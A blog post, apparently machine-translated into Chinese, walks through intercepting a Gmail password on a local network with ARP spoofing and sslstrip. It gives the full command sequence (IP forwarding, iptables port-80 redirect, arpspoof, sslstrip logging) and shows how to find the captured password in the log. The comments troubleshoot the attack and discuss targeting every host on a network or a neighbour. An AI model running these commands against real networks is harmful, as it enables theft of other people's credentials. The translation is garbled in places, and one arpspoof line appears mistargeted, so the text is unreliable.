ArpSpoofing和SSlstrip在行動。

您好Blogger。

今天,我有一小部分樣本說明了在沒有我們許多人喜歡的網絡安全的情況下,在任何網絡中連接網絡有多危險。

今天,我將通過Sslstrip使用ArpSpoofing來獲取Gmail密碼。 為了更好地控制環境,我創建了一個名為“testarp@gmail.com“。

而且由於我不太喜歡序言,所以讓我們開始做生意。

我對他們使用以下信息所做的任何事情均不承擔任何責任。 我完全出於教育目的這樣做

環境

對於此測試,我們具有以下內容:

1.攻擊者: 具有Debian Wheezy的是我的台式機或台式計算機。 您可以從存儲庫中安裝 單條 y 嗅探 擁有 偽造

2.受害人: 受害者是一個Android平板電腦,它只想通過瀏覽器查看他的郵件。

3.媒介: 中間是我的 思科DPC2425路由器

地址。

攻擊者地址: 172.26.0.2

路由器地址:172.26.0.1

受害者的地址: 172.26.0.8

攻擊:

要多了解攻擊的工作原理,可以轉到我的 解決方案&帖子

對於此攻擊,我們要做的第一件事是激活轉發,以便我們的計算機可以在不通知受害者的情況下將信息轉發給受害者。 (否則將是拒絕服務攻擊)

為此,我們將使用:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

每個命令都在直接控制台窗口中。

現在如果我們執行 tail -f desdelinux 我們直接看到即時資訊

快照1

那麼,我們如何得到想要的呢?

首先讓我們在平板電腦上輸入我們的郵件。 登錄時,我們看到控制台上出現了成千上萬的東西。

現在已經完成了,讓我們打開我們的文件“desdelinux” 與奈米

nano desdelinux

使用Control + W,我們搜索稱為SECURE POST的內容。

我們將看到類似的內容。

快照2

受害者的電子郵件和密碼是那條看不見的大字句。

因此,我們向右行駛,直到最終看到隧道盡頭的燈。

快照3

在另一個場合,我們將看到我們如何才能稍微保護自己免受這些攻擊。

問候


發表您的評論

您的電子郵件地址將不會被發表。 必填字段標有 *

*

*

  1. 負責數據:MiguelÁngelGatón
  2. 數據用途:控制垃圾郵件,註釋管理。
  3. 合法性:您的同意
  4. 數據通訊:除非有法律義務,否則不會將數據傳達給第三方。
  5. 數據存儲:Occentus Networks(EU)託管的數據庫
  6. 權利:您可以隨時限制,恢復和刪除您的信息。

  1.   @jlcmux 他說:

    我藉此機會說,發布該帖子時,命令不正確。

    末尾的iptables命令缺少另一行上的8080。 然後arpspoof命令都在同一行上。 每個命令在不同的行上。

    希望編輯者可以看到並修復它。

    問候。

    1.    曼努埃爾·德拉·富恩特 他說:

      我已經做了您提到的更正,可以嗎?

      如果要在首選條目中插入代碼,請使用HTML視圖,並在將文章發送到待處理之前驗證文章是否正確。 謝謝。

  2.   路易斯 他說:

    知道我們這些沒有知識的人是如此脆弱,真是令人不寒而栗。 很好的信息,即使我對這個主題了解得很少,我也知道它的重要性。 謝謝!
    問候

  3.   Giskard 他說:

    但這僅在攻擊者和受害者位於同一網絡上時才有效。 無論如何,在我看來,如果(在同一網絡上)使用HTTPS進行連接不會發生,因為數據在離開您的計算機之前已被加密。 如果您通過HTTP(不帶S)進行連接,我認為即使查看網絡電纜也可以看到密鑰。

    1.    @jlcmux 他說:

      這不是真的。 我正在破解gmail密鑰,如果您發現gmail使用https。 所以? 關鍵是,儘管https是安全的,但它取決於http。 所以它不是那麼安全。

      不要對HTTP承認太多,以至於S不適合超人使用,而是指“安全”使用

    2.    en 他說:

      它可以在有或沒有https的情況下使用,我已經在更專業的linux發行版中進行了嘗試,並且沒有問題

    3.    曼努埃爾·德拉·富恩特 他說:

      您可以精確地使用它為那些竊取您的Wi-Fi的人教課。 😀

      這或多或少就像他們很久以前在Chema Alonso的博客上所說的那樣:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    人造絲 他說:

        Ostia,它的功能非常棒!/然後,當我去檢查銀行帳戶時,每次我使用VPN時,他們都會告訴我偏執狂……)。 順便說一句,你必須看到人們在評論中有多憤世嫉俗...

        1.    埃利奧時間3000 他說:

          現在,我們需要學習有關如何創建和提供自己的VPN服務的教程。

      2.    但以理書 他說:

        您鏈接的故事非常有趣,甚至值得一本新書,這使我想起了我使用鄰居的互聯網時的經歷,儘管我說我知道這個話題,但我認為我永遠也看不到幸運的是,對我而言,他們只將密碼更改為WPA2,這就是我與ISP的故事開始的地方

    4.    他說:

      這就是標題中提到Sslstrip的原因。

      只要攻擊者在中間,它就可以工作

  4.   不久 他說:

    你在棱鏡工作什麼波浪? -.-
    沒有。
    您還在等什麼發送XD請求
    問候
    好帖子

  5.   奧羅斯 他說:

    有趣的是,我稍後再做一個教育測試。也許我什至可以刪除WiFi的密碼,然後玩一會兒😛
    您是否有機會通過類似的操作將不同的頁面發送到目標請求的頁面? 例如,他們想打開Facebook,而我將他們重定向到Google? 😛

    1.    @jlcmux 他說:

      是。 但這是完全不同的一卷。

      也許我以後再發布。

  6.   Lastnewbie 他說:

    很好的帖子,這些主題很有教育意義,現在我們需要能夠抵抗這種攻擊,因為有些人(例如我)連接到公共網絡(例如大學),避免這種攻擊將很有幫助。

    的問候!

  7.   另一個dl用戶 他說:

    這對我沒用🙁

  8.   沃克斯 他說:

    除了通過服務器證書(一旦您的計算機上有證書,瀏覽器負責加密)通過服務器證書對https連接進行加密(使用iptables)重定向了端口80(http)而不是443以外,我在這裡有些失敗,即https

    1.    @jlcmux 他說:

      我也這麼認為。 關鍵是,儘管https是“安全的”,但不幸的是它依賴於http。 因此sslstrip利用了這一點,它使瀏覽器認為它使用的是https憑據,但沒有使用。

      1.    沃克斯 他說:

        天哪! 但瀏覽器應該會看到類似“此證書來自可疑網站或類似內容的警告”之類的警告……我絕對必須對XD進行測試

        1.    @jlcmux 他說:

          不,絕對沒有任何結果。

  9.   另一個dl用戶 他說:

    終於對我有用
    我已使用密碼連接到WEP網絡,並且無論如何它都會直接向我顯示密碼。

    一個問題。 您是否可以對網絡中連接的所有計算機執行相同的步驟,而不要讓一個受害者受害?

    1.    @jlcmux 他說:

      是的你可以。 但是我還沒有做實驗。 自己嘗試,並告訴我們您的狀況。

  10.   辛尼克19 他說:

    我唯一得到的是受害者的機器脫機,但是sslstrip沒有顯示任何信息:/

    1.    @jlcmux 他說:

      您需要暫時禁用防火牆。 或至少啟用傳入連接。

  11.   布萊克先生 他說:

    探針,我只能看到Facebook頁面的用戶名和密碼,在gmail中,我在日誌中沒有找到任何結果,我也只需要一行arpspoof«arpspoof -i -t«。 另一方面,受害機器無法打開某些頁面。 我將繼續調查,這很有趣。 對於使用Manjaro的用戶而言,要安裝的軟件包對dsniff(這裡是arpspoff),twisted和python2-pyopenssl有所幫助。 可以從這裡下載Sslstrip: http://www.thoughtcrime.org/software/sslstrip/
    運行它$ python2 sslstrip.py
    問候。

  12.   布萊克先生 他說:

    它沒有出來,但是arpspoof行是:#arpspoof -i int -t ip-victim ip-router

  13.   吉爾伯特 他說:

    看我完全按照你的意思說:

    echo“ 1”> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    問題是受害者是我在房間裡的另一台電腦,我無法連接到必須重啟路由器的位置,我該怎麼辦?

    另一件事,我正在使用虛擬機,並且當我執行iwconfig命令時,不會出現wlan0,也不會在我執行ifconfig時出現,但是,如果我的虛擬機上有Internet,則帶有eth0接口。